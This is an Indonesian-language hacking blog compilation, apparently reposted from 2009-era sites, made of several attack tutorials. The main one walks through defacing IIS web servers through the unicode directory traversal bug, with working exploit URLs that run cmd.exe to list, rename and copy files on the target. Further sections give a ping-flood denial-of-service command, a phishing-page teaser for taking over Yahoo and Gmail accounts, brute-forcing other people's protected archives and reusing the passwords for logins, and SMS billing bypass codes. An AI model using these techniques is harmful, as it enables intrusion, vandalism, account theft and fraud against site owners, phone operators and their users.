Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji : Muncul pesan ERROR ...
Kaduana : Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka
www.targethost.com tadi ada kemungkinan untuk bisa kita deface...

Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL diatas menjadi empat bagian yaitu :
• Bagian host, yaitu "http://www.targethost.com";
• Bagian exploit string, yaitu "/scripts/..%255c..%255c"
• Bagian folder, yaitu "/winnt/system32/"
• Bagian command, yaitu "cmd.exe?/c+dir+c:\"

Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh
file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\"
atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge
tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"

Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada
browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering
tembus adalah :
- /cgi-bin/..%255c..%255c
- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /scripts/..%255c..%255c

Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka
kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).

Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah
mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,
index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml.
Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau
D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set

URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...
Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah : C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot

Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih
lagehh....hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah.....
truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window....
http://www.targethost.com == neh yg ini......di situ kan alias di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html

Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah...
contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html

Lihat apa yg terjadi di IE kitaa

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access is denied

Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat
targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :

Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site
tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee
(Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk
langkah selanjutnyah*)


Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..
Kedua lewat TFTP32.


Cara pertama :
Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori
C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe
. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL
berikut :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\cmdku.exe
source:google.com

dos 2 pakai cmd dengan ping

Bagi orang-orang yang iseng seperti saya .D os sangat penting banget, apalagi kalo buat orang lain bingung dan kaya ayam mau bertelor. Dos juga bisa pakai cmd kalo gak tau dos,dos bukan yang sedang di maksud loh!itu beda.pakai basic ping yang ada di cmd kita bisa buat orang lain merengek-rengek soalnya ini bisa buat crash!
ini adalah contoh dos sederhana memakai cmd buka cmd/dos ketik kaya gini

ping alamat.komputer -t -l 15000

contoh

ping 192.168.1.13 -t -l 15000

lalu di enter .


komputer 192.168.1.13 akan mendapatkan paket data yang berlebih

bisa juga pakai ping -i ipkomputer 15000 .i

ni lumayan parah soalnya paket datanya nggak bakal berhenti sebelum anda close.paket datanya si... bisa kamu bayanginsendiri. :)

tunggu hingga keluar seperti ini






hack yahoo n gmail

Mengcracking email adalah cracking tingkat tinggi setelah bagaimana cara pembobolan bank, jadi ilmu ini sangat-sangat dirahasiakan. source :http://pedasmaniscinta.blogspot.com/2009/06/hacking-email-yahoo.html

DownLoad Tutorial berikut di
DOWNLOAD




Setelah Download lakukan langkah berikut :

> lihat turorialnya dahulu [dalam video].

> lalu ubah file .htm yang terlampir satu file disana [bernama : yahoo] buka dengan notepad. cara merubahnya dengan notepad : klik kanan file yahoo, open with, lalu klik notepad.

> setelah terbuka notepad tulisan "ISI NAMA SESUAI KEINGINAN ANDA" itu ubah dengan nama terserah bisa diubah dengan nama terserah anda.

> lalu coba lihat lagi video tutorialnya.



ADD : Posting ini hanya diperuntuk kan untuk menakuti user lain.

sumber:http://pc-alert.blogspot.com/2009/08/hacking-e-mail-yahoo-and-gmail.html

jebol password rar,zip dan pdf

Mungkin teman2 pernah suatu kali menemukan file ZIP / RAR / PDF yg tdk bisa dibuka, lantaran dibutuhkan password utk membukanya. Mungkin di warnet, komputer kampus yg di-share, ato juga komputer temen yg mau di-oprek2..hehe. Pastinya pemilik file tsb menganggap filenya sangat penting & rahasia.
Nah, buat yg kena penyakit “penasaran-abis-sampe-ga-bisa-tidur-semalaman” ya bolehlah kita selidiki sedikit apa isinya file itu. Asal dgn niat baik (lho?) dan tidak bermaksud lebih, hanya kita gunakan utk kepentingan pribadi saja..
Ok, singkatnya kita pake sebuah tools, lebih tepatnya 3 tools, karna buat menjebol ZIP, RAR & PDF butuh software yg berbeda.
Kalo tdk ada file buat dijebol, bikin saja dulu sebuah filenya yg ber-password buat latihan..
Menjebol password ZIP
Utk menjebol file ZIP, pake ZIP Password Finder, ukurannya sangat kecil, 483 kb (sebelum diekstrak) bisa didownload dari sini i (Freeware)

* Ekstrak file tadi, lalu install.
* Jalankan program, lalu pilih Open dan pilih file ZIP yg terkunci.
* Setelah terpilih, pd opsi Char Type Property, saran saya pilih saja dulu Alpha (lower)(a-z), utk mencari hanya karakter lowercase, karna password jarang sekali yg terdapat karakter uppercase. Setelah itu Max Password Length cukup 6 atau 7 saja dulu. Kalau sudah klik Start. Utk menampilkan proses pencarian password, bisa klik tombol Display On.
* Prosesnya mungkin memakan waktu agak lama, silahkan tunggu saja.
* Setelah password tertebak, silakan dicoba mengekstrak file yg terkunci tadi & masukan passwordnya. Kalo password benar, maka kt akan berhasil mengekstrak file tsb!!

Menjebol password RAR
Menjebol password RAR menggunakan RAR Password Recovery, silakan download disini (Shareware)

* Ekstrak, lalu install
* Sama seperti yg tadi, Open file RARnya
* Lalu pd opsi Allowed Character pilih saja All Printable Symbol. Lalu Type of Attack pilih Brute Force (utk mencoba segala kemungkinan). Lalu utk Password Length: Minimal Length 3 & Maximal Length 6 ato 7.
* Terakhir, utk opsi Start from sebaiknya ketik abc. Klik Start.
* Tunggu prosesnya, lalu akan didapatkan password RARnya


Menjebol password PDF
Intinya sih sama saja dgn kedua cara di atas, tp utk menjebol file PDF kita memakai Advanced PDF Password Recovery, silakan download disini
————————————————
Satu tambahan lagi, kalo file tsb milik orang yg kita sdh tau pasti, ada keuntungannya juga. Biasanya orang membuat password yg tdk jauh berbeda di tiap accountnya, misalnya di facebook, friendster, dan jg mungkin di file ZIP / RAR nya. Dengan mengetahui username ato emailnya, kita bisa mencoba login sambil mencoba password yg kita temukan tsb. Tapi ini sebetulnya tidak baik kan, jadi pikir 2x sebelum dilakukan..hehe..

dari sumber:http://pc-alert.blogspot.com/2009/10/hack-menjebol-password-rar-zip-pdf.html

code bug telkomsel

SISTEM GSM yang menggunakan teknik switching dengan memanfaatkan system base station
memungkinkan kita bisa mengirim pesan alphanumeric singkat dari sebuah Handphone
ke handphone lain yang nota bene mengirimkan suatu data terenscript yang dapat diditeksi oleh pesawat/nomor
tujuan. dalam hal ini hampir semua fasilitas yang dikembangkan GSM tidak memiliki perbedaan yang sangat rumit,
bahkan malah bisa dibilang HAMPIR SAMA. cuma sekarang dari SATELINDO telah melakukan patching pada sistem transfer smsnya .


Bug sms gratis TELKOMSEL kali ini menggunakan trik yang menyerupai BUG SATELINDO yang lama
yaitu 10 nomer code kartu nomor seri produk TELKOMSEL diantaranya ;
seri 226****** yang mempunyai arti +6281226***** (nomor jakarta)
kode kartu yang bug 260**** s/d 269**** dengan head 0812-
yang berarti kita bisa ngirim sms gratis ke nomor SIMPATI dengan seri 081226***** :-)
note 1: kode * diatas merupakan sembarang nomor (atau semua nomor seri kartu simpati yang aktive)
note 2: hanya dapat dilakukan dengan simcard telkomsel

cara sebagai berikut:

1. ketik SMS
2. kirim kenomor yang dituju ( misal: +6281226378** )
(yang saya dapatkan yaitu bug terlkomsel simcard versi 2260**** s/d 2269**** <- diambil dari kode kartu dan
nomor awal dari kartu mentari tersebut) 10 CODE = 2260,2261,2262,2263,2264,2265,2266,2267,2268,2269
3. cara tulis nomor yang dituju menjadi 226378** (coba dgn nomor lain bila perlu)
4. tidak menggunakan karakter apapun yang ditambah pada nomor tujuan (karakter
bintang hanya untuk menutupi nomor asli yang dituju.
4. dapat kita liat bahwa sms kita terkirim.
5. finish

Dari sana kita bisa lakukan dengan sepuas hati.
referensi sumber:http://pc-alert.blogspot.com/2009/11/hack-10-bug-code-telkomsel.html

sms gratis im3

Sebenernya ini dah lama..Tp
bug ini berbeda dng yang dl
dulu make kode 999908xx
kali ini pun ga beda jauh
tinggal masukan kode
99991900>di ikuti no hp.
Contoh:>
99991900085645xxxxx
lalu send..
Buat kode +62 diganti 0
Gw dah make beberapa
minggu ini dan berhasil..
Dah temen sekampung gw
make semua itu & berhasil.
Apabila terjadi kegagalan
laporan pengiriman sebaik
nya diulangi ampe 4x..
Apabila laporan mengunggu
al hasil itu terkirim..
Belum tentu semua daerah
bs melakukan ini.. Tp baiknya
patut dicoba dolo..
Trik ini udah dicopas di
forum2 tetangga..

cara telpon sms gratis im3

ini adalah cara pertama HACK yang pertama :
Pingin punya sms unlimited dengan nomor sendiri.

Langkah 1:
Tentu saja ucapkan Bismilahirohmanirohim (Penting loh meningkatkan persentase keberhasilan )

Langkah 2:
Duduk manis di depan computer anda!beli cemilan dan coffe klo yg ngerokok ya sekalian siapin rokok!…

Langkah 3:
Buka lah http://www.m3-access.com

Pingin punya sms unlimited dengan nomor sendiri.

Langkah 1:
Tentu saja ucapkan Bismilahirohmanirohim (Penting loh meningkatkan persentase keberhasilan )

Langkah 2:
Duduk manis di depan computer anda!beli cemilan dan coffe klo yg ngerokok ya sekalian siapin rokok!…

Langkah 3:
Buka lah http://www.m3-access.com

Langkah 4:
Masuk form registration
Bagi yg sudah daftar jgn bawel ye…ini buat yg belom daftar!…

Langkah 5:

Bingung????
Apakah cara ini hanya untuk penguna Im3??
Oh tentu tidak kan ada combantrin…eh maksud saya cara lain hehehehe…

Langkah 6:
Save page registration tersebut ke mana saja ( klo saya recommended ke desktop aja biar enak)

Langkah 7:
Open page yg sudah di save tadi dengan ( open with notepad )

Langkah 8:
Saat nya edit meng edit…
Coba temukan Tulisan , seperti gambar di bawah ini ( yg saya lingkari )




Udah ketemu????
Bagusssssssssss…….

Lalu lanjutkan dengan menambahin/mengedit form tersebut seperti gambar di bawah ini


Lihat gambar di bawah ini…


Lalu boleh anda save dan coba lihat page editan tersebut
Klo anda bener nyettingnya Pasti gambar nya kek gini


Langkah 9:
Saatnya mengubah action dr page editan tadi!
Oke buka lage page editan yg sudah anda save!
Jgn lupa open with notepad ye…



Langsung aja edit nga pake lama…

Langkah 10:

Buka http://m3-access.com/account/register.php
dan copy keycode dengan cara ,copy image location seperti gambar di bawah ini



Lalu buka/Kembali ke page yg di buka dengan notepad…
Dan temukan script seperti gambar di bawah ini!

Dan ubahlah yg saya tulisan yg saya lingkari dengan cara Paste Seperti gambar di bawah ini!

Lalu save dan jalankan page yg sudah di edit tadi dengan browser apa saja!
Mau mozila kek mau IE mau apa kek terserah!…
Lalu akan muncul form registration yg telah kita edit tadi!dan ikuti saja langkah langkah selanjutnya!

ANDA berhasil jika setelah submit QUERY anda mendapatkan pesan bertuliskan…

PASSKEY akan dikirim dalam waktu paling lama 2 x 24 jam
Congratulations anda bisa ikuti langkah2 selanjutnya dan segera ke form sms untuk sms sepuasnya!…

Jika anda tidak mendapatkan pesan tersebut!berarti anda gagal…

Semoga Berguna…

>> Scripts nya ada di Source code / Scripts… tau masih bisa apa tidak!!:)
referensi :http://pc-alert.blogspot.com/2009/11/hack-im3-cara-1.html

look ! bugs my blog

visitors